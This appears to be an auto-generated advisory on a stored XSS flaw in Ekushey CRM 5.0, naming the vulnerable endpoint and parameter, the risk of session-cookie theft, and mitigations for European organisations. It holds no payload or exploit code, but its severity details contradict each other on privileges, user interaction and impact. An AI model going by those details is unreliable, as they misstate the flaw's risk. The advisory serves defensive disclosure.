CVE-2025-40989 is a stored Cross-Site Scripting (XSS) vulnerability identified in version 5.0 of the Ekushey CRM product developed by Creativeitem. The vulnerability arises from improper neutralization of user input during web page generation, specifically in the handling of the "message" parameter submitted via POST requests to the endpoint "/ekushey/index.php/client/project_message/add/xxx". Due to insufficient input validation and sanitization, an attacker with authenticated access can inject malicious scripts that are stored and subsequently executed in the context of other authenticated users viewing the affected page. This stored XSS can be exploited remotely without requiring user interaction beyond visiting the compromised page, enabling attackers to steal session cookies and potentially hijack user sessions. The CVSS 4.0 base score of 5.1 reflects a medium severity, considering the attack vector is network-based, requires low attack complexity, no privileges, but does require user interaction (the victim must view the malicious message). The vulnerability does not impact confidentiality, integrity, or availability directly beyond session hijacking potential. No public exploits or patches are currently known or available. The vulnerability is classified under CWE-79, which covers improper neutralization of input leading to XSS attacks. The issue was reserved in April 2025 and published in October 2025, indicating recent discovery and disclosure. The lack of patch availability suggests that affected organizations need to implement interim mitigations to reduce risk until an official fix is released.

For European organizations using Ekushey CRM version 5.0, this vulnerability poses a risk of session hijacking through stored XSS attacks. Attackers can craft malicious messages that, when viewed by authenticated users, execute scripts to steal session cookies, potentially allowing unauthorized access to sensitive CRM data. This can lead to unauthorized data disclosure, manipulation of customer information, and disruption of business processes reliant on the CRM. Given that CRM systems often contain personal data protected under GDPR, exploitation could result in regulatory non-compliance and reputational damage. The medium severity rating reflects moderate risk; however, the impact could escalate if attackers leverage stolen sessions to perform further attacks or data exfiltration. The requirement for authenticated access to inject malicious content limits the attack surface but insider threats or compromised accounts increase risk. The absence of known exploits in the wild reduces immediate threat but does not eliminate future exploitation potential. Organizations relying on Ekushey CRM for client management, project tracking, or communication should be particularly vigilant.

Since no official patches are currently available, European organizations should implement the following specific mitigations: 1) Restrict access to the message submission endpoint to trusted users only and enforce strict authentication and authorization controls to reduce the risk of malicious input injection. 2) Implement Web Application Firewall (WAF) rules that detect and block common XSS payloads targeting the vulnerable parameter. 3) Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in the CRM web interface. 4) Conduct regular user training to recognize suspicious messages and report anomalies. 5) Monitor logs for unusual POST requests to the affected endpoint and anomalous user behavior indicative of exploitation attempts. 6) If feasible, sanitize inputs at the application layer by applying custom filters or escaping mechanisms on the "message" parameter before rendering. 7) Plan for prompt application of official patches once released by Creativeitem. 8) Consider isolating the CRM environment or restricting network access to minimize exposure. These targeted measures go beyond generic advice by focusing on the specific vulnerable parameter, endpoint, and attack vector described.